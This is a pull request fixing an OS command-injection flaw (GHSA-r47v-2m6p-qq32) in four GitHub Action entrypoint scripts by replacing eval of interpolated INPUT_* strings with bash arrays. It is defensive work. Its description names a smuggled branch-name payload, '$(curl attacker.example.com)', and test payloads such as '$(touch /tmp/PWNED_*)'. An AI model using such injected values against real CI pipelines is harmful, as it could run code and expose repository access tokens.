### PR TITLE
fix(security): replace eval with bash arrays in action entrypoints

### DIFF
--- a/actions/autosync/auto-sync-entrypoint.sh
+++ b/actions/autosync/auto-sync-entrypoint.sh
@@ -7,39 +7,43 @@ source /common.sh
 
 set_git_safe_directory
 
-# Initialize the command variable
-command="complyscribe autosync \
-        --markdown-dir=\"${INPUT_MARKDOWN_DIR}\" \
-        --oscal-model=\"${INPUT_OSCAL_MODEL}\" \
-        --ssp-index-file=\"${INPUT_SSP_INDEX_FILE}\" \
-        --commit-message=\"${INPUT_COMMIT_MESSAGE}\" \
-        --branch=\"${INPUT_BRANCH}\" \
-        --file-patterns=\"${INPUT_FILE_PATTERNS}\" \
-        --committer-name=\"${INPUT_COMMIT_USER_NAME}\" \
-        --committer-email=\"${INPUT_COMMIT_USER_EMAIL}\" \
-        --author-name=\"${INPUT_COMMIT_AUTHOR_NAME}\" \
-        --author-email=\"${INPUT_COMMIT_AUTHOR_EMAIL}\" \
-        --repo-path=\"${INPUT_REPO_PATH}\" \
-        --target-branch=\"${INPUT_TARGET_BRANCH}\" \
-        --skip-items=\"${INPUT_SKIP_ITEMS}\" \
-        --version=\"${INPUT_VERSION}\"
-        --config=\"${INPUT_CONFIG}\""
+# Build the argument list as an array so values are passed verbatim to
+# complyscribe and are not re-parsed by the shell. Using `eval` on an
+# interpolated command string would let shell metacharacters in any
+# INPUT_* value execute as code (GHSA-r47v-2m6p-qq32).
+args=(
+    --markdown-dir="${INPUT_MARKDOWN_DIR}"
+    --oscal-model="${INPUT_OSCAL_MODEL}"
+    --ssp-index-file="${INPUT_SSP_INDEX_FILE}"
+    --commit-message="${INPUT_COMMIT_MESSAGE}"
+    --branch="${INPUT_BRANCH}"
+    --file-patterns="${INPUT_FILE_PATTERNS}"
+    --committer-name="${INPUT_COMMIT_USER_NAME}"
+    --committer-email="${INPUT_COMMIT_USER_EMAIL}"
+    --author-name="${INPUT_COMMIT_AUTHOR_NAME}"
+    --author-email="${INPUT_COMMIT_AUTHOR_EMAIL}"
+    --repo-path="${INPUT_REPO_PATH}"
+    --target-branch="${INPUT_TARGET_BRANCH}"
+    --skip-items="${INPUT_SKIP_ITEMS}"
+    --version="${INPUT_VERSION}"
+    --config="${INPUT_CONFIG}"
+)
 
 # Conditionally include flags
 if [[ ${INPUT_SKIP_ASSEMBLE} == true ]]; then
-    command+=" --skip-assemble"
+    args+=(--skip-assemble)
 fi
 
 if [[ ${INPUT_SKIP_REGENERATE} == true ]]; then
-    command+=" --skip-regenerate"
+    args+=(--skip-regenerate)
 fi
 
 if [[ ${INPUT_DRY_RUN} == true ]]; then
-    command+=" --dry-run"
+    args+=(--dry-run)
 fi
 
 if [[ ${INPUT_DEBUG} == true ]]; then
-    command+=" --debug"
+    args+=(--debug)
 fi
 
-eval "${command}"
+complyscribe autosync "${args[@]}"

--- a/actions/create-cd/create-cd-entrypoint.sh
+++ b/actions/create-cd/create-cd-entrypoint.sh
@@ -7,33 +7,37 @@ source /common.sh
 
 set_git_safe_directory
 
-# Initialize the command variable
-command="complyscribe create compdef \
-        --profile-name=\"${INPUT_PROFILE_NAME}\" \
-        --compdef-name=\"${INPUT_COMPONENT_DEFINITION_NAME}\" \
-        --component-title=\"${INPUT_COMPONENT_TITLE}\" \
-        --component-description=\"${INPUT_COMPONENT_DESCRIPTION}\" \
-        --component-definition-type=\"${INPUT_COMPONENT_TYPE}\" \
-        --markdown-dir=\"${INPUT_MARKDOWN_DIR}\" \
-        --commit-message=\"${INPUT_COMMIT_MESSAGE}\" \
-        --filter-by-profile=\"${INPUT_FILTER_BY_PROFILE}\" \
-        --branch=\"${INPUT_BRANCH}\" \
-        --file-patterns=\"${INPUT_FILE_PATTERNS}\" \
-        --committer-name=\"${INPUT_COMMIT_USER_NAME}\" \
-        --committer-email=\"${INPUT_COMMIT_USER_EMAIL}\" \
-        --author-name=\"${INPUT_COMMIT_AUTHOR_NAME}\" \
-        --author-email=\"${INPUT_COMMIT_AUTHOR_EMAIL}\" \
-        --repo-path=\"${INPUT_REPO_PATH}\" \
-        --target-branch=\"${INPUT_TARGET_BRANCH}\"
-        --config=\"${INPUT_CONFIG}\""
+# Build the argument list as an array so values are passed verbatim to
+# complyscribe and are not re-parsed by the shell. Using `eval` on an
+# interpolated command string would let shell metacharacters in any
+# INPUT_* value execute as code (GHSA-r47v-2m6p-qq32).
+args=(
+    --profile-name="${INPUT_PROFILE_NAME}"
+    --compdef-name="${INPUT_COMPONENT_DEFINITION_NAME}"
+    --component-title="${INPUT_COMPONENT_TITLE}"
+    --component-description="${INPUT_COMPONENT_DESCRIPTION}"
+    --component-definition-type="${INPUT_COMPONENT_TYPE}"
+    --markdown-dir="${INPUT_MARKDOWN_DIR}"
+    --commit-message="${INPUT_COMMIT_MESSAGE}"
+    --filter-by-profile="${INPUT_FILTER_BY_PROFILE}"
+    --branch="${INPUT_BRANCH}"
+    --file-patterns="${INPUT_FILE_PATTERNS}"
+    --committer-name="${INPUT_COMMIT_USER_NAME}"
+    --committer-email="${INPUT_COMMIT_USER_EMAIL}"
+    --author-name="${INPUT_COMMIT_AUTHOR_NAME}"
+    --author-email="${INPUT_COMMIT_AUTHOR_EMAIL}"
+    --repo-path="${INPUT_REPO_PATH}"
+    --target-branch="${INPUT_TARGET_BRANCH}"
+    --config="${INPUT_CONFIG}"
+)
 
 # Conditionally include flags
 if [[ ${INPUT_DRY_RUN} == true ]]; then
-    command+=" --dry-run"
+    args+=(--dry-run)
 fi
 
 if [[ ${INPUT_DEBUG} == true ]]; then
-    command+=" --debug"
+    args+=(--debug)
 fi
 
-eval "${command}"
+complyscribe create compdef "${args[@]}"

--- a/actions/rules-transform/rules-transform-entrypoint.sh
+++ b/actions/rules-transform/rules-transform-entrypoint.sh
@@ -7,30 +7,34 @@ source /common.sh
 
 set_git_safe_directory
 
-# Initialize the command variable
-command="complyscribe rules-transform \
-        --markdown-dir=\"${INPUT_MARKDOWN_DIR}\" \
-        --rules-view-dir=\"${INPUT_RULES_VIEW_DIR}\" \
-        --commit-message=\"${INPUT_COMMIT_MESSAGE}\" \
-        --branch=\"${INPUT_BRANCH}\" \
-        --file-patterns=\"${INPUT_FILE_PATTERNS}\" \
-        --committer-name=\"${INPUT_COMMIT_USER_NAME}\" \
-        --committer-email=\"${INPUT_COMMIT_USER_EMAIL}\" \
-        --author-name=\"${INPUT_COMMIT_AUTHOR_NAME}\" \
-        --author-email=\"${INPUT_COMMIT_AUTHOR_EMAIL}\" \
-        --repo-path=\"${INPUT_REPO_PATH}\" \
-        --target-branch=\"${INPUT_TARGET_BRANCH}\" \
-        --skip-items=\"${INPUT_SKIP_ITEMS}\"
-        --version=\"${INPUT_VERSION}\"
-        --config=\"${INPUT_CONFIG}\""
+# Build the argument list as an array so values are passed verbatim to
+# complyscribe and are not re-parsed by the shell. Using `eval` on an
+# interpolated command string would let shell metacharacters in any
+# INPUT_* value execute as code (GHSA-r47v-2m6p-qq32).
+args=(
+    --markdown-dir="${INPUT_MARKDOWN_DIR}"
+    --rules-view-dir="${INPUT_RULES_VIEW_DIR}"
+    --commit-message="${INPUT_COMMIT_MESSAGE}"
+    --branch="${INPUT_BRANCH}"
+    --file-patterns="${INPUT_FILE_PATTERNS}"
+    --committer-name="${INPUT_COMMIT_USER_NAME}"
+    --committer-email="${INPUT_COMMIT_USER_EMAIL}"
+    --author-name="${INPUT_COMMIT_AUTHOR_NAME}"
+    --author-email="${INPUT_COMMIT_AUTHOR_EMAIL}"
+    --repo-path="${INPUT_REPO_PATH}"
+    --target-branch="${INPUT_TARGET_BRANCH}"
+    --skip-items="${INPUT_SKIP_ITEMS}"
+    --version="${INPUT_VERSION}"
+    --config="${INPUT_CONFIG}"
+)
 
 # Conditionally include flags
 if [[ ${INPUT_DRY_RUN} == true ]]; then
-    command+=" --dry-run"
+    args+=(--dry-run)
 fi
 
 if [[ ${INPUT_DEBUG} == true ]]; then
-    command+=" --debug"
+    args+=(--debug)
 fi
 
-eval "${command}"
+complyscribe rules-transform "${args[@]}"

--- a/actions/sync-upstreams/sync-upstreams-entrypoint.sh
+++ b/actions/sync-upstreams/sync-upstreams-entrypoint.sh
@@ -10,33 +10,37 @@ set_git_safe_directory
 # Transform the input sources into a comma separated list
 INPUT_SOURCES=$(echo "${INPUT_SOURCES}" | tr '\n' ' ' | tr -s ' ' | sed 's/ *$//' | tr ' ' ',')
 
-# Initialize the command variable
-command="complyscribe sync-upstreams \
-        --sources=\"${INPUT_SOURCES}\" \
-        --include-models=\"${INPUT_INCLUDE_MODELS}\" \
-        --exclude-models=\"${INPUT_EXCLUDE_MODELS}\" \
-        --commit-message=\"${INPUT_COMMIT_MESSAGE}\" \
-        --branch=\"${INPUT_BRANCH}\" \
-        --file-patterns=\"${INPUT_FILE_PATTERNS}\" \
-        --committer-name=\"${INPUT_COMMIT_USER_NAME}\" \
-        --committer-email=\"${INPUT_COMMIT_USER_EMAIL}\" \
-        --author-name=\"${INPUT_COMMIT_AUTHOR_NAME}\" \
-        --author-email=\"${INPUT_COMMIT_AUTHOR_EMAIL}\" \
-        --repo-path=\"${INPUT_REPO_PATH}\" \
-        --target-branch=\"${INPUT_TARGET_BRANCH}\"
-        --config=\"${INPUT_CONFIG}\""
+# Build the argument list as an array so values are passed verbatim to
+# complyscribe and are not re-parsed by the shell. Using `eval` on an
+# interpolated command string would let shell metacharacters in any
+# INPUT_* value execute as code (GHSA-r47v-2m6p-qq32).
+args=(
+    --sources="${INPUT_SOURCES}"
+    --include-models="${INPUT_INCLUDE_MODELS}"
+    --exclude-models="${INPUT_EXCLUDE_MODELS}"
+    --commit-message="${INPUT_COMMIT_MESSAGE}"
+    --branch="${INPUT_BRANCH}"
+    --file-patterns="${INPUT_FILE_PATTERNS}"
+    --committer-name="${INPUT_COMMIT_USER_NAME}"
+    --committer-email="${INPUT_COMMIT_USER_EMAIL}"
+    --author-name="${INPUT_COMMIT_AUTHOR_NAME}"
+    --author-email="${INPUT_COMMIT_AUTHOR_EMAIL}"
+    --repo-path="${INPUT_REPO_PATH}"
+    --target-branch="${INPUT_TARGET_BRANCH}"
+    --config="${INPUT_CONFIG}"
+)
 
 # Conditionally include flags
 if [[ ${INPUT_SKIP_VALIDATION} == true ]]; then
-    command+=" --skip-validation"
+    args+=(--skip-validation)
 fi
 
 if [[ ${INPUT_DRY_RUN} == true ]]; then
-    command+=" --dry-run"
+    args+=(--dry-run)
 fi
 
 if [[ ${INPUT_DEBUG} == true ]]; then
-    command+=" --debug"
+    args+=(--debug)
 fi
 
-eval "${command}"
+complyscribe sync-upstreams "${args[@]}"


### PR DESCRIPTION
## Summary

The four Docker action entrypoint scripts (`auto-sync-entrypoint.sh`,
`create-cd-entrypoint.sh`, `rules-transform-entrypoint.sh`,
`sync-upstreams-entrypoint.sh`) built a single command string by
interpolating `INPUT_*` environment variables and ran it through `eval`.
Because `eval` re-parses the string after the variables have been
expanded, shell metacharacters in any input value (`$(...)`, backticks,
quote-breaking) are interpreted and executed.

The `branch` input alone is enough to reach this -- the four `action.yml`
files default it to `${{ github.ref_name }}`, and Git permits `$`, `(`,
`)`, and backtick characters in branch names. A PR from a branch named
`$(curl attacker.example.com)` would land in `INPUT_BRANCH` and execute
inside the container, which has access to `COMPLYSCRIBE_REPO_ACCESS_TOKEN`.

This was reported privately as **GHSA-r47v-2m6p-qq32**.

## Fix

Each entrypoint now builds an `args=( ... )` array and passes it to
`complyscribe` directly:

```bash
args=(
    --markdown-dir="${INPUT_MARKDOWN_DIR}"
    --branch="${INPUT_BRANCH}"
    ...
)
complyscribe autosync "${args[@]}"
```

Conditional flags use `args+=(--flag)`. The shell never re-parses the
values, so injection payloads are passed as literal argument strings.

This pattern is the standard remediation in the GitHub Actions security
guidance and is shellcheck-clean.

## Validation

- `bash -n` and `shellcheck -x` clean on all four scripts.
- Re-ran the original PoC payloads (`\$(touch /tmp/PWNED_*)`, backtick
  variants) against the patched `auto-sync-entrypoint.sh` with a stub
  `complyscribe` on `PATH`. All payloads were passed through as literal
  argument strings; no canary files were created.

## Notes for reviewers

- Behavior change is limited to safe execution: the same flags with the
  same values are passed to `complyscribe`. No CLI surface change.
- Drive-by: the prior code had a missing `\` line continuation before
  `--config=...` in three of the four scripts, leaving a literal newline
  in the eval'd string. The array form removes that latent bug too.

## References

- Advisory: GHSA-r47v-2m6p-qq32
- CWE-78 (OS Command Injection)
- Coordinated privately with @marcusburghardt (Slack, 2026-05-08).